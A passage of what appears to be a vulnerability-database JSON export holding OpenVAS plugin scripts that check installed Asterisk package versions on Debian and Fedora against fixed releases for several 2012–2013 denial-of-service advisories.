isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-25T10:51:47", "description": "Check for the Version of asterisk", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-10T00:00:00", "id": "OPENVAS:866890", "href": "http://plugins.openvas.org/nasl.php?oid=866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\n\nif(description)\n{\n script_id(866890);\n script_version(\"$Revision: 6628 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 08:32:47 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n tag_insight = \"Asterisk is a complete PBX in software. It runs on Linux and provides\nall of the features you would expect from a PBX and more. Asterisk\ndoes voice over IP in three protocols, and can interoperate with\nalmost all standards-based telephony equipment using relatively\ninexpensive hardware.\n\";\n\n tag_affected = \"asterisk on Fedora 19\";\n\n tag_solution = \"Please Install the Updated Packages.\";\n\n\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name: \"FEDORA\", value: \"2013-15560\");\n script_xref(name: \"URL\" , value: \"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_summary(\"Check for the Version of asterisk\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:37:54", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-09-18T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-15560", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310866890", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310866890", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-15560\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.866890\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-09-18 10:07:16 +0530 (Wed, 18 Sep 2013)\");\n script_cve_id(\"CVE-2013-5641\", \"CVE-2013-5642\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-15560\");\n\n\n script_tag(name:\"affected\", value:\"asterisk on Fedora 19\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-15560\");\n script_xref(name:\"URL\", value:\"https://lists.fedoraproject.org/pipermail/package-announce/2013-September/115650.html\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora\", \"ssh/login/rpms\", re:\"ssh/login/release=FC19\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = rpm_get_ssh_release();\nif(!release)\n exit(0);\n\nres = \"\";\n\nif(release == \"FC19\")\n{\n\n if ((res = isrpmvuln(pkg:\"asterisk\", rpm:\"asterisk~11.5.1~2.fc19\", rls:\"FC19\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99);\n exit(0);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2017-07-24T12:51:52", "description": "Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.", "cvss3": {}, "published": "2013-09-02T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2013-5641", "CVE-2013-5642"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892749", "href": "http://plugins.openvas.org/nasl.php?oid=892749", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2749.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2749-1 using nvtgen 1.0\n# Script version: 1.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the oldstable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze11.\n\nFor the stable distribution (wheezy), these problems have been fixed in\nversion 1.8.13.1~dfsg-3+deb7u1.\n\nFor the unstable distribution (sid), these problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Colin Cuthbertson and Walter Doekes discovered two vulnerabilities in\nthe SIP processing code of Asterisk - an open source PBX and telephony\ntoolkit -, which could result in denial of service.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892749);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2013-5642\", \"CVE-2013-5641\");\n script_name(\"Debian Security Advisory DSA 2749-1 (asterisk - several vulnerabilities)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-09-02 00:00:00 +0200 (Mon, 02 Sep 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2749.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze11\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dahdi\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mobile\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-modules\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mp3\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-mysql\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-ooh323\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-imapstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-voicemail-odbcstorage\", ver:\"1.8.13.1~dfsg-3+deb7u1\", rls:\"DEB7.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2017-07-24T12:51:55", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.", "cvss3": {}, "published": "2013-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2605-2 (asterisk - several issues)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2017-07-07T00:00:00", "id": "OPENVAS:892605", "href": "http://plugins.openvas.org/nasl.php?oid=892605", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2605.nasl 6611 2017-07-07 12:07:20Z cfischer $\n# Auto-generated from advisory DSA 2605-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\n\ntag_affected = \"asterisk on Debian Linux\";\ntag_insight = \"Asterisk is an Open Source PBX and telephony toolkit. It is, in a\nsense, middleware between Internet and telephony channels on the bottom,\nand Internet and telephony applications at the top.\";\ntag_solution = \"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\";\ntag_summary = \"Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\";\ntag_vuldetect = \"This check tests the installed software version using the apt package manager.\";\n\nif(description)\n{\n script_id(892605);\n script_version(\"$Revision: 6611 $\");\n script_cve_id(\"CVE-2012-5977\", \"CVE-2012-5976\");\n script_name(\"Debian Security Advisory DSA 2605-2 (asterisk - several issues)\");\n script_tag(name: \"last_modification\", value:\"$Date: 2017-07-07 14:07:20 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name: \"creation_date\", value:\"2013-01-19 00:00:00 +0100 (Sat, 19 Jan 2013)\");\n script_tag(name: \"cvss_base\", value:\"5.0\");\n script_tag(name: \"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name: \"URL\", value: \"http://www.debian.org/security/2013/dsa-2605.html\");\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name: \"affected\", value: tag_affected);\n script_tag(name: \"insight\", value: tag_insight);\n# script_tag(name: \"impact\", value: tag_impact);\n script_tag(name: \"solution\", value: tag_solution);\n script_tag(name: \"summary\", value: tag_summary);\n script_tag(name: \"vuldetect\", value: tag_vuldetect);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2019-05-29T18:38:13", "description": "Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.", "cvss3": {}, "published": "2013-01-19T00:00:00", "type": "openvas", "title": "Debian Security Advisory DSA 2605-2 (asterisk - several issues)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-18T00:00:00", "id": "OPENVAS:1361412562310892605", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310892605", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_2605.nasl 14276 2019-03-18 14:43:56Z cfischer $\n# Auto-generated from advisory DSA 2605-2 using nvtgen 1.0\n# Script version: 2.0\n#\n# Author:\n# Greenbone Networks\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or\n# modify it under the terms of the GNU General Public License\n# as published by the Free Software Foundation; either version 2\n# of the License, or (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.892605\");\n script_version(\"$Revision: 14276 $\");\n script_cve_id(\"CVE-2012-5977\", \"CVE-2012-5976\");\n script_name(\"Debian Security Advisory DSA 2605-2 (asterisk - several issues)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-18 15:43:56 +0100 (Mon, 18 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-19 00:00:00 +0100 (Sat, 19 Jan 2013)\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n\n script_xref(name:\"URL\", value:\"http://www.debian.org/security/2013/dsa-2605.html\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (c) 2013 Greenbone Networks GmbH http://greenbone.net\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\", re:\"ssh/login/release=DEB6\");\n script_tag(name:\"affected\", value:\"asterisk on Debian Linux\");\n script_tag(name:\"solution\", value:\"For the stable distribution (squeeze), these problems have been fixed in\nversion 1:1.6.2.9-2+squeeze10.\n\nFor the testing distribution (wheezy) and unstable distribution (sid),\nthese problems will be fixed soon.\n\nWe recommend that you upgrade your asterisk packages.\");\n script_tag(name:\"summary\", value:\"Several vulnerabilities were discovered in Asterisk, a PBX and telephony\ntoolkit, that allow remote attackers to perform denial of service\nattacks.\");\n script_tag(name:\"vuldetect\", value:\"This check tests the installed software version using the apt package manager.\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n\n exit(0);\n}\n\ninclude(\"revisions-lib.inc\");\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif((res = isdpkgvuln(pkg:\"asterisk\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-config\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dbg\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-dev\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-doc\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-h323\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\nif((res = isdpkgvuln(pkg:\"asterisk-sounds-main\", ver:\"1:1.6.2.9-2+squeeze10\", rls:\"DEB6\")) != NULL) {\n report += res;\n}\n\nif(report != \"\") {\n security_message(data:report);\n} else if(__pkg_match) {\n exit(99);\n}", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:P"}}, {"lastseen": "2019-05-29T18:38:25", "description": "The remote host is missing an update for the ", "cvss3": {}, "published": "2013-01-31T00:00:00", "type": "openvas", "title": "Fedora Update for asterisk FEDORA-2013-1003", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2012-5976", "CVE-2012-5977"], "modified": "2019-03-15T00:00:00", "id": "OPENVAS:1361412562310865273", "href": "http://plugins.openvas.org/nasl.php?oid=1361412562310865273", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for asterisk FEDORA-2013-1003\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2013 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\nif(description)\n{\n script_tag(name:\"affected\", value:\"asterisk on Fedora 18\");\n script_tag(name:\"solution\", value:\"Please install the updated package(s).\");\n script_xref(name:\"URL\", value:\"http://lists.fedoraproject.org/pipermail/package-announce/2013-January/097760.html\");\n script_oid(\"1.3.6.1.4.1.25623.1.0.865273\");\n script_version(\"$Revision: 14223 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2019-03-15 14:49:35 +0100 (Fri, 15 Mar 2019) $\");\n script_tag(name:\"creation_date\", value:\"2013-01-31 09:25:06 +0530 (Thu, 31 Jan 2013)\");\n script_cve_id(\"CVE-2012-5976\", \"CVE-2012-5977\");\n script_tag(name:\"cvss_base\", value:\"5.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:N/A:P\");\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n script_xref(name:\"FEDORA\", value:\"2013-1003\");\n script_name(\"Fedora Update for asterisk FEDORA-2013-1003\");\n script_tag(name:\"summary\", value:\"The remote host is missing an update for the 'asterisk'\n package(s) announced via the referenced advisory.\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright 